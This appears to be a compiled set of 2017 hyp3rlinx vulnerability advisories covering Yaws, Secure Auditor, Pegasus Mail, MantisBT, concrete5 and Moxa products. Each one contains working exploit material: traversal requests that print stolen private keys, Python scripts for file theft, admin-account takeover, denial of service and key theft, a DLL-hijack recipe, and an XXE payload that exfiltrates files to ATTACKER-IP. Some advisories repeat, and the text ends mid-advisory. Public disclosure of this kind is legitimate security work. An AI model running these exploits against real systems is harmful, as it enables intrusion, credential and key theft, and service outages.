CVE-2017-10974 Yaws Web Server v1.91 Unauthenticated Remote File Disclosure
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: == yaws.hyber.org Product: === Yaws v1.91 (Yet Another Web Server) Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications. Two separate modes of operations are supported: Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode. Embedded mode where Yaws runs as an embedded webserver in another Erlang application. Vulnerability Type: === Unauthenticated Remote File Disclosure CVE Reference: == CVE-2017-10974 Security Issue: Remote attackers who can reach Yaws web server can read the server SSL private key file using directory traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download as of the time of this writing. http://yaws.hyber.org/download/ Exploit/POC: = Steal Yaws Server SSL private key ".pem" file. curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem -BEGIN RSA PRIVATE KEY- MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++ 3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt +INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA== -END RSA PRIVATE KEY- --- OR Read the access logs. --- curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access 404 Not Found Not FoundThe requested URL /../logs/localhost.8080.access was not found on this server. Yaws 1.91 Server at localhost:8080 [root@localhost ~]# Then, curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws; "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" etc... Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: June 26, 2017 No replies July 7, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
www.secure-bytes.com
Product:
=
Secure Auditor - v3.0
Secure Auditor suite is a unified digital risk management solution for
conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
Vulnerability Type:
===
Directory Traversal
CVE Reference:
==
CVE-2017-9024
Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=
www.pmail.com
Product:
===
Pegasus "winpm-32.exe"
v4.72 build 572
Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client
suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions
of users since it was released in 1990.
Vulnerability Type:
==
Remote Code Execution
CVE Reference:
==
CVE-2017-9046
Security Issue:
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by
clicking an HTML "mailto:; link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully
using Internet Explorer Web Browser.
e.g.
mailto:n...@victim.com;>Link text
Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer",
click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.
User needs to have setup PMAIL with "mailto:; link option on install.
Exploit:
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with
"mailto:; link option on install.
2) Compile "ssgp.dll" as DLL using below 'C' code.
#include
//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}
return 0;
}
3) Place "ssgp.dll" on Desktop
4) Create an HTML file with following in the web server root directory.
mailto:n...@victim.com;>Pegasus Exploit POC
5) Open webpage in InternetExplorer Web Browser and click malicious mailto:
link.
Our code gets executed...
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-9046 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
www.mantisbt.org
Product:
=
Mantis Bug Tracker
1.3.10 / v2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in PHP
works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
CSRF Permalink Injection
CVE Reference:
==
CVE-2017-7620
Security Issue:
Remote attackers can inject arbitrary permalinks into the mantisbt Web
Interface if an authenticated user visits a malicious webpage.
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for
supplied backslashes.
Line: 270
# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}
# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];
Exploit/POC:
=
http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP;
method="POST">
document.forms[0].submit()
OR
http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0;
method="POST">
document.forms[0].submit()
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
www.secure-bytes.com
Product:
=
Secure Auditor - v3.0
Secure Auditor suite is a unified digital risk management solution for
conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
Vulnerability Type:
===
Directory Traversal
CVE Reference:
==
CVE-2017-9024
Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec
Vendor:
www.mantisbt.org
Product:
==
Mantis Bug Tracker
v1.3.0 / 2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in PHP
works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
===
Pre-Auth Remote Password Reset
CVE Reference:
==
CVE-2017-7615
Security Issue:
Mantis account verification page 'verify.php' allows resetting ANY user's
password.
Remote un-authenticated attackers can send HTTP GET requests to Hijack ANY
Mantis accounts by guessing the ID / username.
Vulnerable code:
In verify.php line 66:
if( $f_confirm_hash != $t_token_confirm_hash ) {
trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
}
This code attempts to verify a user account and compares hashes for a user
request.
However, by supplying empty value we easily bypass the security check.
e.g.
http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1_hash=
This will then allow you to change passwords and hijack ANY mantisbt accounts.
All version >= 1.3.0 as well as 2.3.0 are affected, 1.2.x versions are not
affected.
References:
https://mantisbt.org/bugs/view.php?id=22690#c56509
POC Video URL:
==
https://vimeo.com/213144905
Exploit/POC:
=
import cookielib,urllib,urllib2,time
print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0'
print '1.2.x versions are not affected'
print 'Remote Password Reset 0day Exploit'
print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n'
IP=raw_input("[Mantis Victim IP]>")
realname=raw_input("[Username]")
verify_user_id=raw_input("[User ID]")
passwd=raw_input("[New Password]")
TARGET =
'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'_hash='
values={}
account_update_token=''
#verify_user_id='1' #Admin = 1
#realname='administrator'#Must be known or guessed.
#REQUEST 1, get Mantis account_update_token
cookies = cookielib.CookieJar()
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))
res = opener.open(TARGET)
arr=res.readlines()
for s in arr:
if 'account_update_token' in s:
break
#print s[61:-38]
ACCT_TOKEN=s[61:-38]
time.sleep(0.3)
#REQUEST 2 Hijack the Admin Account
TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php'
values = {'verify_user_id' : '1',
'account_update_token' : ACCT_TOKEN,
'realname' : realname,
'password' : passwd,
'password_confirm' : passwd}
data = urllib.urlencode(values)
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))
response = opener.open(TARGET, data)
the_page = response.read()
http_headers = response.info()
#print http_headers
print response.getcode()
print 'Account Hijacked!'
time.sleep(2)
Network Access:
===
Remote
Severity:
=
Critical
Disclosure Timeline:
=
Vendor Notification: April 7, 2017
Vendor acknowledged: April 7, 2017
Vendor patch created: April 10, 2017
Vendor Disclosure: April 16, 2017
April 16, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
concrete5 v8.1.0 Host Header Injection
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.concrete5.org Product: concrete5 v8.1.0 concrete5 is an open-source content management system (CMS) for publishing content on the World Wide Web and intranets. Vulnerability Type: == Host Header Injection CVE Reference: == CVE-2017-7725 Security Issue: If a user does not specify a "canonical" URL on installation of concrete5, unauthenticated remote attackers can write to the "collectionversionblocksoutputcache" table of the MySQL Database, by making HTTP GET request with a poisoned HOST header. Some affected concrete5 webpages can then potentially render arbitrary links that can point to a malicious website. Example MySQL data from "CollectionVersionBlocksOutputCache" table. (164, 1, 57, 'Header Site Title', 'http://attacker-ip/concrete5-8.1.0/index.php; id="header-site-title">Elemental', 1649861489 e.g. c:\> curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" | more Services :: POC var CCM_DISPATCHER_FILENAME = "/concrete5-8.1.0/index.php"; var CCM_CID = 162; var CCM_EDIT_MODE = false; var CCM_ARRANGE_MODE = false; var CCM_IMAGE_PATH = "/concrete5-8.1.0/concrete/images"; var CCM_TOOLS_PATH = "/concrete5-8.1.0/index.php/tools/required"; var CCM_APPLICATION_URL = "<a rel="nofollow" href="http://attacker-ip/concrete5-8.1.0"">http://attacker-ip/concrete5-8.1.0"</a>;; <=== HERE var CCM_REL = "/concrete5-8.1.0"; Exploit: = curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/team/faq -H "Host: attacker-ip" curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio -H "Host: attacker-ip" Navigate to one of these URLs: http://VICTIM-IP/concrete5-8.1.0/index.php/services http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio Click on links in header portion of the webpage from one of the above URLs. Services Portfolio Team / Drop down Menu Blog Contact OR click on the links on footer portion of the webpage. FAQ / Help Case Studies Blog Another Link View on Google Maps Result: user gets redirected to attacker-ip. Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification : April 11, 2017 Vendor reply: "this is a known issue" : April 12, 2017 Requested a CVE from mitre. CVE assigned : April 12, 2017 April 13, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-7456 Moxa MXview v2.8 Denial Of Service
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
www.moxa.com
Product:
===
MXView v2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime,
anywhere.
Vulnerability Type:
===
Denial Of Service
CVE Reference:
==
CVE-2017-7456
Security Issue:
Remote attackers can DOS MXView server by sending large string of junk
characters for the user ID and password field login credentials.
Exploit/POC:
=
import urllib,urllib2
print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'
IP=raw_input("[Moxa MXView IP]>")
PAYLOAD="A"*2
url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})
while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
==
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC
Vendor:
www.moxa.com
Product:
===
MXview V2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime,
anywhere.
Vulnerability Type:
=
Remote Private Key Disclosure
CVE Reference:
==
CVE-2017-7455
Security Issue:
MXview stores a copy of its web servers private key under
C:\Users\TARGET-USER\AppData\Roaming\moxa\mxview\web\certs\mxview.key.
Remote attackers can easily access/read this private key "mxview.key" file by
making an HTTP GET request.
e.g.
curl -v http://VICTIM-IP:81/certs/mxview.key
* About to connect() to VICTIM-IP port 81
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 81
> GET /certs/mxview.key HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
> Host: VICTIM-IP:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Tue Feb 28 14:18:00 2017
< Server: GoAhead-Webs
< Last-modified: Tue Feb 28 10:46:51 2017
< Content-length: 916
< Content-type: text/plain
-BEGIN PRIVATE KEY-
MIICdwIBADANBgkqhkiG2w0BAQEFAASCAmEwggJdAgEAAoGBAMO2BjHS6rFYqxPb
QCjhVn5+UGwfICfETzk5JQvhkhc71bnsDHI7lVyYhheYLcPQBEglVolwGANPp7LF
2lhG+UaSFfTVk8UDvV0qQpjSQvDjcWSuKBfceyT5zmI8ynxuMHoqBR7ZOSLY31z+
Rxt+JCykwqfMGdjawnC5ivr8iWDpAgMBAAECgYAQpHjwYbQtcpHRtXJGR6s4RHuI
RjlQyGPIRPC+iucGbMMm9Ui1qhVwc1Pry7gQj67dh7dNJqgUGAD1tdd0bEykKoqm
ICgXj0HMPCLxUy4CHIZInsBhzAyp/3atkDIaeELZckCbmttkVvncDi+b9HnuL/To
YwJpuLkpXEKpjK7iAQJBAOof+yliPn7UsBecw/Hc/ixeDRGI1kjtvuOvSi6jLZoj
3rzODMSD1eRcrK/GJydWVT8TV3WXXYn3M1cu3kmQJKkCQQDV/zlBtFFPPVAl1zy7
UBG+RPI63uXeaA0C1+RX2XfJSR4zeKxnWgalzUl0UwMgWB3Gpp2+VW5a/zw3aKlK
6MJBAkBHPMXqWKdVZhfSh3Ojky+PhmqJjE5PUG/FzZ9Pw3zrqsBqSHPgE5Ewc/Zj
YXKmavCbSaJR+GWQxjPL8knWrlJJAkEAkahnEJHrxkO1igw3Ckg0y4yiU+/kBr5M
HONWSXV8U0WxiNdagf6FB9XzaXoXZuyTl+NQ+3yq4MVZ910F3jcQAQJBAI+q0AcX
EskHai2Fx24gkHwwRxacsiXrRClxIj5NB52CSo2Sy6EF02DKQVWR3oIjDesXcWvl
+CPTV6agBkYxe7Q=
-END PRIVATE KEY-
Exploit:
=
import socket
print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'
IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)
print 'Enjoy ur private server key!\n'
print s.recv(512)
s.close()
Network Access:
===
Remote
Severity:
=
Critical
Disclosure Timeline:
===
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
HYP3RLINX
CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection
[+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt [+] ISR: ApparitionSec Vendor: www.moxa.com Product: === MX-AOPC UA SERVER - 1.5 Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication. Vulnerability Type: == XML External Entity Injection CVE Reference: == CVE-2017-7457 Security Issue: XML External Entity via ".AOP" files used by MX-AOPC Server result in remote file disclosure. If local user opens a specially crafted malicious MX-AOPC Server file type. Exploit/POC: = run MX-AOPC UA Server / Runtime / Start Server Runtime Service a) ATTACKER SERVER LISTENER we will access Windows msfmap.ini as proof of concept python -m SimpleHTTPServer 8080 "Evil.AOP" file http://ATTACKER-IP:8080/payload.dtd;> %dtd;]> b) Evil "payload.dtd" file host on ATTACKER SERVER http://ATTACKER-IP:8080?%file;'>"> %all; e.g. python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 - VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20se ction.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 - Network Access: === 